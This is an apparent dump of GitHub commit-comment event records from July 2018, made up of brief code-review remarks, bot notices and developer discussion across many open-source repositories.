{"id":"8004609270","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29801885,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-23T15:19:31Z","updated_at":"2018-07-23T15:19:31Z","author_association":"NONE","body":"Do not sacrifice readability. This will cost us in a future."}},"created_at":"2018-07-23T15:19:31Z"}
{"id":"8004609424","type":"CommitCommentEvent","actor":{"login":"ggglebao"},"repo":{"name":"ggglebao/dGroup"},"payload":{"comment":{"id":29801886,"position":null,"line":null,"path":null,"commit_id":"06ac63ea8f2f3a606c603497c08591cc32f15904","created_at":"2018-07-23T15:19:33Z","updated_at":"2018-07-23T15:19:33Z","author_association":"OWNER","body":"bj"}},"created_at":"2018-07-23T15:19:33Z"}
{"id":"8004613776","type":"CommitCommentEvent","actor":{"login":"csiefer2"},"repo":{"name":"agenbyte/Trilinos"},"payload":{"comment":{"id":29801893,"position":56,"line":729,"path":"packages/trilinoscouplings/examples/scaling/TrilinosCouplings_TpetraIntrepidPoissonExample.cpp","commit_id":"a7d11d432d4d435c4010e826dc072d0bb70ea4dd","created_at":"2018-07-23T15:20:15Z","updated_at":"2018-07-23T15:20:15Z","author_association":"NONE","body":"Let's not precompute these guys --- just use elemToNode(i,j) directly in the next loop"}},"created_at":"2018-07-23T15:20:15Z"}
{"id":"8004615145","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801894,"position":10,"line":10,"path":"lesson 1/perfect_weight.rb","commit_id":"c5f830b1ceef6a2fac44c0dd9e20efb6af3398bb","created_at":"2018-07-23T15:20:27Z","updated_at":"2018-07-23T15:20:27Z","author_association":"NONE","body":"Tab нужно заменить на soft tab (2 пробела)"}},"created_at":"2018-07-23T15:20:27Z"}
{"id":"8004618562","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801903,"position":7,"line":7,"path":"lesson 1/perfect_weight.rb","commit_id":"c5f830b1ceef6a2fac44c0dd9e20efb6af3398bb","created_at":"2018-07-23T15:21:01Z","updated_at":"2018-07-23T15:21:01Z","author_association":"NONE","body":"Преобразование логичней сделать во время считывания значения, а не при вычислении"}},"created_at":"2018-07-23T15:21:01Z"}
{"id":"8004618883","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29801904,"position":null,"line":null,"path":null,"commit_id":"5e6716019f70a789266f79d609750d33b219c2da","created_at":"2018-07-23T15:21:04Z","updated_at":"2018-07-23T15:21:04Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-38](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-38).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-38-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T15:21:04Z"}
{"id":"8004622183","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29801915,"position":null,"line":null,"path":null,"commit_id":"1ea929f071a991db08592e714331602d1cfc40a1","created_at":"2018-07-23T15:21:35Z","updated_at":"2018-07-23T15:21:35Z","author_association":"MEMBER","body":"Thank you 👍 "}},"created_at":"2018-07-23T15:21:35Z"}
{"id":"8004623147","type":"CommitCommentEvent","actor":{"login":"TanHaoran"},"repo":{"name":"TanHaoran/concurrency"},"payload":{"comment":{"id":29801918,"position":null,"line":null,"path":null,"commit_id":"ab8db36ffa57e7a0b0cf8db7abf8e5e1ae5ef7c5","created_at":"2018-07-23T15:21:43Z","updated_at":"2018-07-23T15:21:43Z","author_association":"OWNER","body":"普通类型的long和double变量，JVM允许将64位的读操作或写操作拆成两个32位的操作。\r\nLongAdder优点：\r\nLongAdder将热点数据分离，可以将AtomicLong内部的核心数据value分离成一个数组，每个线程访问时，通过哈希等算法映射到其中一个数字进行计数，而最终的计数结果为这个数组的求和累加。其中热点数据value会被分离成多个单元的cell，每个cell独自维护内部的值，当前对象的实际值由所有的cell累计合成。这样热点就进行了有效的分离并提高了并行度。LongAdder相当于在AtomicLong的基础上将单点的更新压力分散到各个节点上，在低并发的时候通过对base的直接更新可以保证和Atomic的性能基本一致，而在高并发的时候通过分散提高性能。\r\nLon在gAdder缺点：\r\n在统计的时候，如果有并发更新，可能会导致统计的数据有误差。\r\n实际使用中在处理高并发计数的时候，可以优先使用LongAdder，而不是使用AtomicLong。在线程竞争很低的时候还是可以使用AtomicLong的，更简单、更直接、效率更高，例如序列号的生成，需要准确数据，处理全局唯一的时候，AtomicLong才是正确的选择。"}},"created_at":"2018-07-23T15:21:43Z"}
{"id":"8004624753","type":"CommitCommentEvent","actor":{"login":"dracc"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29801920,"position":38,"line":28,"path":"Projects/CoX/Servers/MapServer/NetCommandManager.cpp","commit_id":"ea2d0ed5ee85f702b5c6970a8464cbe6cafd257b","created_at":"2018-07-23T15:21:59Z","updated_at":"2018-07-23T15:21:59Z","author_association":"CONTRIBUTOR","body":"Yes.  \r\nYes.  \r\nNot sure, but it's probably a good idea. It's also possible that EntitiyResponse is the place where serverside netcommand access level is supposed to happen."}},"created_at":"2018-07-23T15:21:59Z"}
{"id":"8004625731","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29801922,"position":37,"line":338,"path":"application/helpers/SurveyRuntimeHelper.php","commit_id":"e5ec3c1d48beaa64435d3c932b18e61eff8a5553","created_at":"2018-07-23T15:22:08Z","updated_at":"2018-07-23T15:22:08Z","author_association":"COLLABORATOR","body":"When reloading same survey ? It's desired behaviour no ?\r\n\r\nShow same order except with newtest=Y or new session / new token / survey submitted etc …"}},"created_at":"2018-07-23T15:22:08Z"}
{"id":"8004627195","type":"CommitCommentEvent","actor":{"login":"csiefer2"},"repo":{"name":"agenbyte/Trilinos"},"payload":{"comment":{"id":29801931,"position":66,"line":739,"path":"packages/trilinoscouplings/examples/scaling/TrilinosCouplings_TpetraIntrepidPoissonExample.cpp","commit_id":"a7d11d432d4d435c4010e826dc072d0bb70ea4dd","created_at":"2018-07-23T15:22:21Z","updated_at":"2018-07-23T15:22:21Z","author_association":"NONE","body":"We should not hardwire 3 here...  Use the variable \"dim\""}},"created_at":"2018-07-23T15:22:21Z"}
{"id":"8004628466","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29801938,"position":7,"line":7,"path":"lesson 1/triangle.rb","commit_id":"c5f830b1ceef6a2fac44c0dd9e20efb6af3398bb","created_at":"2018-07-23T15:22:32Z","updated_at":"2018-07-23T15:22:32Z","author_association":"NONE","body":"Вокруг операторов необходим пробел.\r\nРекомендую ознакомиться с [ruby style guide](https://github.com/rubocop-hq/ruby-style-guide)\r\n\r\nТакже в конце файла должна быть пустая строка (красная стрелка указывает а ее отсутствие). Можно настроить редактор, чтобы следил за этим"}},"created_at":"2018-07-23T15:22:32Z"}
{"id":"8004628549","type":"CommitCommentEvent","actor":{"login":"csiefer2"},"repo":{"name":"agenbyte/Trilinos"},"payload":{"comment":{"id":29801940,"position":80,"line":753,"path":"packages/trilinoscouplings/examples/scaling/TrilinosCouplings_TpetraIntrepidPoissonExample.cpp","commit_id":"a7d11d432d4d435c4010e826dc072d0bb70ea4dd","created_at":"2018-07-23T15:22:33Z","updated_at":"2018-07-23T15:22:33Z","author_association":"NONE","body":"See above comment about hardwiring 3"}},"created_at":"2018-07-23T15:22:33Z"}
{"id":"8004630340","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29801942,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:22:49Z","updated_at":"2018-07-23T15:22:49Z","author_association":"OWNER","body":"Sorry. But not really. With patched libui, they just run but in no use. You see I have left that mapper thing there :D. Again sorry for false alarm bro."}},"created_at":"2018-07-23T15:22:49Z"}
{"id":"8004630446","type":"CommitCommentEvent","actor":{"login":"csiefer2"},"repo":{"name":"agenbyte/Trilinos"},"payload":{"comment":{"id":29801943,"position":93,"line":766,"path":"packages/trilinoscouplings/examples/scaling/TrilinosCouplings_TpetraIntrepidPoissonExample.cpp","commit_id":"a7d11d432d4d435c4010e826dc072d0bb70ea4dd","created_at":"2018-07-23T15:22:50Z","updated_at":"2018-07-23T15:22:50Z","author_association":"NONE","body":"See above comment"}},"created_at":"2018-07-23T15:22:50Z"}
{"id":"8004631430","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29801944,"position":null,"line":null,"path":null,"commit_id":"50287a55d3b07623120d938a4159d051e32d852d","created_at":"2018-07-23T15:22:58Z","updated_at":"2018-07-23T15:22:58Z","author_association":"NONE","body":"Indeed. Is that incorrect?"}},"created_at":"2018-07-23T15:22:58Z"}
{"id":"8004675598","type":"CommitCommentEvent","actor":{"login":"Levovar"},"repo":{"name":"lmdaly/kubernetes"},"payload":{"comment":{"id":29802028,"position":144,"line":144,"path":"pkg/kubelet/cm/numamanager/numamanger.go","commit_id":"53e4b8b4cf53b925f333509e0cab359af5dfdeba","created_at":"2018-07-23T15:29:53Z","updated_at":"2018-07-23T15:29:53Z","author_association":"NONE","body":"I think finding the right condition when NUMA calculation should be done will be the most difficult :)\r\n\r\nIMO Guaranteed QoS is not good, because what happens if the Pod does not ask any core resources, only special ones? I'm not sure it will be put into Guaranteed QoS\r\n\r\nalso I think whether NUMA alignment is needed or not is kind of resource specific. What I mean is:\r\n- for CPU, we might only want to check for NUMA if exclusive CPUs were requested\r\n- for memory, we might only want to check for NUMA if HugePages were requested\r\n- fro devices, we might only want to check for NUMA if any DP handled resource is requested from a NUMA-aware DP (what does it mean is a separate comment)\r\n\r\nSo, my thinking is that shouldn't we push the responsibility of \"hey, do we even want to check for NUMA\" to the hint providers? E.g. by adding a new bool function to the HintProvider interface, saying \"IsNumaAlignmentNeeded\"? Then calling calculateNUMAAffinity could be put behind \"for every registered NUMA handler let's call IsNumaAlignmentNeeded, if we get at least one true, we start alignment, otherwise skip it\"\r\n\r\nwe need to measure which operation takes longer: checking for alignment, or the actual alignment. if checking is longer, probably we should always check. if aligning takes longer, we should I think optimize it via above method (or somehow else)"}},"created_at":"2018-07-23T15:29:53Z"}
{"id":"8004678218","type":"CommitCommentEvent","actor":{"login":"nagytier"},"repo":{"name":"nagytier/learning"},"payload":{"comment":{"id":29802035,"position":null,"line":null,"path":null,"commit_id":"71470f4a76b54e842d910ead170f134d4c4028d5","created_at":"2018-07-23T15:30:18Z","updated_at":"2018-07-23T15:30:18Z","author_association":"OWNER","body":"corrected a typo in the added text"}},"created_at":"2018-07-23T15:30:18Z"}
{"id":"8004680278","type":"CommitCommentEvent","actor":{"login":"tomtheone"},"repo":{"name":"horde/horde"},"payload":{"comment":{"id":29802038,"position":null,"line":null,"path":null,"commit_id":"eecdbee303d91dae3613dbf45c1c6634d27340e6","created_at":"2018-07-23T15:30:37Z","updated_at":"2018-07-23T15:30:37Z","author_association":"NONE","body":"Hi all\r\n\r\nI got it. Found out how to reach my goal: 'Disable notification in case a meeting is canceled'.\r\n\r\nWorks with version Calendar (kronolith) 4.2.24 / Horde_ActiveSync 2.39.3\r\n\r\nOpen kronolith/js/kronolith.js and jump to line 4605. Find:\r\n\r\n`this.paramsCache.sendupdates = 1;`\r\n\r\nChange to:\r\n\r\n`this.paramsCache.sendupdates = 0;`\r\n\r\nBest regards\r\nTom\r\n"}},"created_at":"2018-07-23T15:30:37Z"}
{"id":"8004682896","type":"CommitCommentEvent","actor":{"login":"xxyan0205"},"repo":{"name":"didi/mand-mobile"},"payload":{"comment":{"id":29802047,"position":null,"line":null,"path":null,"commit_id":"2c08a8cfa8c624885d6c1ed43808f2278dcb4179","created_at":"2018-07-23T15:31:01Z","updated_at":"2018-07-23T15:31:01Z","author_association":"MEMBER","body":"#158 "}},"created_at":"2018-07-23T15:31:01Z"}
{"id":"8004694787","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29802060,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:32:51Z","updated_at":"2018-07-23T15:32:51Z","author_association":"NONE","body":"No actually I got the commit notified through Gmail\r\nBut wait, it is supposed to run even with patched libui, because there're 2 paths in libui: legacy and HIDL\r\nIf HIDL libs are there then it will call HIDL graphics lib, else use legacy impl like before. This is supposed to give boot logo screen as mapper doesn't even exist for allocator lol"}},"created_at":"2018-07-23T15:32:51Z"}
{"id":"8004698226","type":"CommitCommentEvent","actor":{"login":"ggouaillardet"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":29802064,"position":80,"line":124,"path":"opal/mca/event/external/configure.m4","commit_id":"a70ecf526773a3bc43b582f8d44e91b5def374e1","created_at":"2018-07-23T15:33:25Z","updated_at":"2018-07-23T15:33:25Z","author_association":"CONTRIBUTOR","body":"`opal_event_external_support` is a global variable (used by `pmix/ext?x`) and __cannot__ be present here\r\n"}},"created_at":"2018-07-23T15:33:25Z"}
{"id":"8004701376","type":"CommitCommentEvent","actor":{"login":"Levovar"},"repo":{"name":"lmdaly/kubernetes"},"payload":{"comment":{"id":29802067,"position":147,"line":147,"path":"pkg/kubelet/cm/numamanager/numamanger.go","commit_id":"53e4b8b4cf53b925f333509e0cab359af5dfdeba","created_at":"2018-07-23T15:33:55Z","updated_at":"2018-07-23T15:33:55Z","author_association":"NONE","body":"just a generic comment: checking the value of bool variables could be done simply with \"if result.Affinity\" or \"if !result.Affinity\"\r\nif bool variables are also named as yes/noquestions like \"result.IsAffinityRequired\", reading the flow of the code becomes much nicer and \"human-parsable\" like:\r\n\"if AffinityIsRequired && !MaskIsEmpty() {\""}},"created_at":"2018-07-23T15:33:55Z"}
{"id":"8004706592","type":"CommitCommentEvent","actor":{"login":"Irina5566"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802076,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:34:46Z","updated_at":"2018-07-23T15:34:46Z","author_association":"NONE","body":"very very good project"}},"created_at":"2018-07-23T15:34:46Z"}
{"id":"8004713623","type":"CommitCommentEvent","actor":{"login":"winsmith"},"repo":{"name":"elgatosf/jonah"},"payload":{"comment":{"id":29802093,"position":null,"line":null,"path":null,"commit_id":"3edefe5a9a2454894f2dd21ccbb3782a8fad40ce","created_at":"2018-07-23T15:35:50Z","updated_at":"2018-07-23T15:35:50Z","author_association":"CONTRIBUTOR","body":"<3"}},"created_at":"2018-07-23T15:35:50Z"}
{"id":"8004718369","type":"CommitCommentEvent","actor":{"login":"marechal-p"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29802097,"position":null,"line":null,"path":null,"commit_id":"f62dca6f3c8028dc69fff5be439fcc5d90a87124","created_at":"2018-07-23T15:36:32Z","updated_at":"2018-07-23T15:36:32Z","author_association":"COLLABORATOR","body":"For now try to detect it based on the last scene that gets removed.\r\n\r\nBut `bge.logic.onExit` would be very nice to have indeed ! Expect it someday :)"}},"created_at":"2018-07-23T15:36:32Z"}
{"id":"8004718640","type":"CommitCommentEvent","actor":{"login":"laptou"},"repo":{"name":"TMPOTagEd2018/room-security"},"payload":{"comment":{"id":29802099,"position":34,"line":61,"path":"nodes/box-node/box-node.ino","commit_id":"d7d702d94245ef97945b6f5db9af9291fac992b6","created_at":"2018-07-23T15:36:34Z","updated_at":"2018-07-23T15:36:34Z","author_association":"CONTRIBUTOR","body":"@SimonAbrelat Can you please explain this block?"}},"created_at":"2018-07-23T15:36:34Z"}
{"id":"8004721301","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29802104,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:37:00Z","updated_at":"2018-07-23T15:37:00Z","author_association":"OWNER","body":"Yeah. I think the patched libui make the system ignore this hidl path and go for the legacy path instead."}},"created_at":"2018-07-23T15:37:00Z"}
{"id":"8004721733","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/geotext-feedstock"},"payload":{"comment":{"id":29802106,"position":null,"line":null,"path":null,"commit_id":"98120db42335fd7fc325c897a8567ba2073377a1","created_at":"2018-07-23T15:37:03Z","updated_at":"2018-07-23T15:37:03Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T15:37:03Z"}
{"id":"8004725912","type":"CommitCommentEvent","actor":{"login":"laptou"},"repo":{"name":"TMPOTagEd2018/room-security"},"payload":{"comment":{"id":29802115,"position":34,"line":61,"path":"nodes/box-node/box-node.ino","commit_id":"d7d702d94245ef97945b6f5db9af9291fac992b6","created_at":"2018-07-23T15:37:42Z","updated_at":"2018-07-23T15:37:42Z","author_association":"CONTRIBUTOR","body":"Like what is it supposed to do? Because this won't compile; it gives this error:\r\n``\r\nI:\\git\\GTRI\\room-security\\nodes\\box-node\\box-node.ino: In function 'void loop()':\r\n\r\nbox-node:64: error: cannot convert 'String' to 'char*' in initialization\r\n``"}},"created_at":"2018-07-23T15:37:42Z"}
{"id":"8004726713","type":"CommitCommentEvent","actor":{"login":"ryanmackenziewhite"},"repo":{"name":"ryanmackenziewhite/physt"},"payload":{"comment":{"id":29802116,"position":null,"line":null,"path":null,"commit_id":"b80aaea03eb9b732fd44dd43faab8f728ccd1401","created_at":"2018-07-23T15:37:48Z","updated_at":"2018-07-23T15:37:48Z","author_association":"OWNER","body":"Thanks! Your package has been pretty helpful now that I live in a ROOTless world. The existing histogram classes in the python stack did not cut it. Now I want something like TFile and hadd.  "}},"created_at":"2018-07-23T15:37:48Z"}
{"id":"8004728004","type":"CommitCommentEvent","actor":{"login":"KalekaSan"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29802121,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T15:38:01Z","updated_at":"2018-07-23T15:38:01Z","author_association":"NONE","body":"Грандиозный проект и отличная команда"}},"created_at":"2018-07-23T15:38:01Z"}
{"id":"8004734435","type":"CommitCommentEvent","actor":{"login":"cuzfrog"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29802135,"position":34,"line":112,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"c7b84c49eb050b4e967bbde0185b41a1106afffa","created_at":"2018-07-23T15:39:04Z","updated_at":"2018-07-23T15:39:04Z","author_association":"CONTRIBUTOR","body":"My tests passed now. Sincerely thank you @tcurdt "}},"created_at":"2018-07-23T15:39:04Z"}
{"id":"8004737898","type":"CommitCommentEvent","actor":{"login":"TejalPawar10"},"repo":{"name":"kalpataru/IP_Stream_Encryption_using_AES_and_FPGA"},"payload":{"comment":{"id":29802143,"position":null,"line":null,"path":null,"commit_id":"28da33fc15c59a592e1d493a707bfe2cd6d3d3ab","created_at":"2018-07-23T15:39:31Z","updated_at":"2018-07-23T15:39:31Z","author_association":"NONE","body":"can this code be implemented on all types of fpga?"}},"created_at":"2018-07-23T15:39:31Z"}
{"id":"8004739370","type":"CommitCommentEvent","actor":{"login":"thetabloom"},"repo":{"name":"aweissman11/2DoBox-Pivot"},"payload":{"comment":{"id":29802145,"position":null,"line":null,"path":null,"commit_id":"e76e7d49a991a8e39606418a97273b03045bf494","created_at":"2018-07-23T15:39:43Z","updated_at":"2018-07-23T15:39:43Z","author_association":"COLLABORATOR","body":"still refiguring the flex on these elements."}},"created_at":"2018-07-23T15:39:43Z"}
{"id":"8004742570","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pocketsphinx-feedstock"},"payload":{"comment":{"id":29802151,"position":null,"line":null,"path":null,"commit_id":"773da767844089e996a5464af2cd80052308fbac","created_at":"2018-07-23T15:40:14Z","updated_at":"2018-07-23T15:40:14Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T15:40:14Z"}
{"id":"8004744262","type":"CommitCommentEvent","actor":{"login":"aryam7"},"repo":{"name":"aryam7/studycloud"},"payload":{"comment":{"id":29802155,"position":null,"line":null,"path":null,"commit_id":"fa48673d4720425b91610804591b2cc0f1ad716f","created_at":"2018-07-23T15:40:31Z","updated_at":"2018-07-23T15:40:31Z","author_association":"OWNER","body":"agh I cherry picked this commit from #82\r\nand then realized that this version of the Server.js file got replaced in #82\r\nhopefully it won't cause problems when merging. we'll see"}},"created_at":"2018-07-23T15:40:31Z"}
{"id":"8004744982","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29802157,"position":null,"line":null,"path":null,"commit_id":"1ea929f071a991db08592e714331602d1cfc40a1","created_at":"2018-07-23T15:40:38Z","updated_at":"2018-07-23T15:40:38Z","author_association":"MEMBER","body":"For updating all submodules to the latest versions you can use:\r\n\r\nhttps://github.com/PLi-metas/pli-extras/blob/develop/update.sh\r\n\r\nthen\r\n\r\nhttps://github.com/PLi-metas/pli-extras/blob/develop/submodule.sh\r\n\r\nbut submodule.sh uses \"git commit -S -m\" so you need to have GPG key here: https://github.com/settings/keys\r\n\r\n;)"}},"created_at":"2018-07-23T15:40:38Z"}
{"id":"8004747859","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29802166,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T15:41:08Z","updated_at":"2018-07-23T15:41:08Z","author_association":"OWNER","body":"Даже не знаю, как сделать. Известные мне способы не подходят. Automatic Dimension не для этого. Если только задать каждой ячейке константу с высотой и потом доставать в этом методе высоту из массива с ячейками..."}},"created_at":"2018-07-23T15:41:08Z"}
{"id":"8004747991","type":"CommitCommentEvent","actor":{"login":"laptou"},"repo":{"name":"TMPOTagEd2018/room-security"},"payload":{"comment":{"id":29802167,"position":6,"line":5,"path":"nodes/box-node/box-node.ino","commit_id":"d7d702d94245ef97945b6f5db9af9291fac992b6","created_at":"2018-07-23T15:41:09Z","updated_at":"2018-07-23T15:41:09Z","author_association":"CONTRIBUTOR","body":"@SimonAbrelat Why did you remove this? It's throwing an error on line 37 without it."}},"created_at":"2018-07-23T15:41:09Z"}
{"id":"8004749932","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29802170,"position":null,"line":null,"path":null,"commit_id":"028d24d667330df9bfbd0818403593f859d3887f","created_at":"2018-07-23T15:41:27Z","updated_at":"2018-07-23T15:41:27Z","author_association":"NONE","body":"The patched libui brings back legacy path only, and the HIDL paths are still preferred more, so obviously it'll use HIDL allocator instead of legacy gralloc1 allocator"}},"created_at":"2018-07-23T15:41:27Z"}
{"id":"8004749968","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29802171,"position":5,"line":117,"path":"code/drasil-lang/Language/Drasil/Document.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-23T15:41:28Z","updated_at":"2018-07-23T15:41:28Z","author_association":"COLLABORATOR","body":"Done in 21a52da."}},"created_at":"2018-07-23T15:41:28Z"}
{"id":"8004750593","type":"CommitCommentEvent","actor":{"login":"PedjaHC"},"repo":{"name":"PedjaHC/TheFirstOne"},"payload":{"comment":{"id":29802172,"position":null,"line":null,"path":null,"commit_id":"697d2d085efa9f56ad183f9ee637cb20b6e73d93","created_at":"2018-07-23T15:41:34Z","updated_at":"2018-07-23T15:41:34Z","author_association":"OWNER","body":"Merge"}},"created_at":"2018-07-23T15:41:34Z"}
{"id":"8004752243","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29802173,"position":11,"line":11,"path":"HowMuch/Code/Services/PersonDataService.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T15:41:48Z","updated_at":"2018-07-23T15:41:48Z","author_association":"OWNER","body":"Да, хорошо, добавлю. "}},"created_at":"2018-07-23T15:41:48Z"}
{"id":"8004753764","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29802178,"position":3,"line":2,"path":"HowMuch/Code/Presentation/Groups/Cells/FourMembers/FourMembersCell.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T15:42:03Z","updated_at":"2018-07-23T15:42:03Z","author_association":"OWNER","body":"Упс."}},"created_at":"2018-07-23T15:42:03Z"}
{"id":"8004755135","type":"CommitCommentEvent","actor":{"login":"Levovar"},"repo":{"name":"lmdaly/kubernetes"},"payload":{"comment":{"id":29802181,"position":42,"line":160,"path":"pkg/kubelet/cm/cpumanager/cpu_manager.go","commit_id":"53e4b8b4cf53b925f333509e0cab359af5dfdeba","created_at":"2018-07-23T15:42:16Z","updated_at":"2018-07-23T15:42:16Z","author_association":"NONE","body":"what I was thinking is that this probably could be made Pod-specific, rather than Manager instance specific (which I think is node specific)\r\n\r\nso, some workloads might require NUMA affinity alignment, some might not. even if right now we would simply align all workloads, IMO we should implement it in a way that Pod-level checks can be easily plugged in later\r\n\r\nin case we go workload specific alignment, we don't need to store the affinity as a new member variable in the struct. we should have a function though which figures it out for all Pods (related comment is also added to the manager itself)"}},"created_at":"2018-07-23T15:42:16Z"}
{"id":"8004765180","type":"CommitCommentEvent","actor":{"login":"PedjaHC"},"repo":{"name":"PedjaHC/TheFirstOne"},"payload":{"comment":{"id":29802208,"position":null,"line":null,"path":null,"commit_id":"697d2d085efa9f56ad183f9ee637cb20b6e73d93","created_at":"2018-07-23T15:43:54Z","updated_at":"2018-07-23T15:43:54Z","author_association":"OWNER","body":"Merge dao"}},"created_at":"2018-07-23T15:43:54Z"}
{"id":"8004769208","type":"CommitCommentEvent","actor":{"login":"PedjaHC"},"repo":{"name":"PedjaHC/TheFirstOne"},"payload":{"comment":{"id":29802218,"position":null,"line":null,"path":null,"commit_id":"697d2d085efa9f56ad183f9ee637cb20b6e73d93","created_at":"2018-07-23T15:44:34Z","updated_at":"2018-07-23T15:44:34Z","author_association":"OWNER","body":"Routes merge"}},"created_at":"2018-07-23T15:44:34Z"}
{"id":"8004771288","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"BO41/phpmyadmin"},"payload":{"comment":{"id":29802226,"position":null,"line":null,"path":null,"commit_id":"f6b7a341d194c59da0da2154b9d0b39c965f709e","created_at":"2018-07-23T15:44:55Z","updated_at":"2018-07-23T15:44:55Z","author_association":"NONE","body":"<!-- PMABOT:TAB -->\nThis commit is using tab character for indentation instead of spaces, what is mandated by phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: themes/metro/jquery/jquery-ui.css, themes/original/jquery/jquery-ui.css, themes/pmahomme/jquery/jquery-ui.css"}},"created_at":"2018-07-23T15:44:55Z"}
{"id":"8004774063","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29802238,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T15:45:21Z","updated_at":"2018-07-23T15:45:21Z","author_association":"NONE","body":"@snicolet Sorry for the mess, but the problem was because there wasn't enough memory on the machines and they began swapping TT out of RAM.\r\nI also checked, there is zero segfault on the RMAed Ryzens, so the workers are bug-free."}},"created_at":"2018-07-23T15:45:21Z"}
